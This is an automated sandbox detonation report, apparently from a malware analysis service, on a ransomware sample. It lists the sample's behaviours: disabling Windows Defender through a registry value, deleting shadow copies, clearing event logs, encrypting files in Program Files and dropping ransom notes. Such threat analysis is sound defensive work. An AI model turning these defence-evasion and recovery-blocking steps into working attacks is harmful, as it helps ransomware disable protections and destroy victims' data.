Analysis Overview
SHA256
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1
Threat Level: Known bad
The file 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Hive
Deletes shadow copies
Clears Windows event logs
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 15:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 15:00
Reported
2022-01-12 15:00
Platform
win10-en-20211208
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 15:00
Reported
2022-01-12 15:05
Platform
win7-en-20211208
Max time kernel
126s
Max time network
127s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01253_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALHM.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeFax.Dotx.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\BTOPENWORLD.COM.XML.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FORMCTL.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\fr-FR\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\Accessible.tlb.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\SLATE.INF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\deploy\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\it.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00760L.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14757_.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
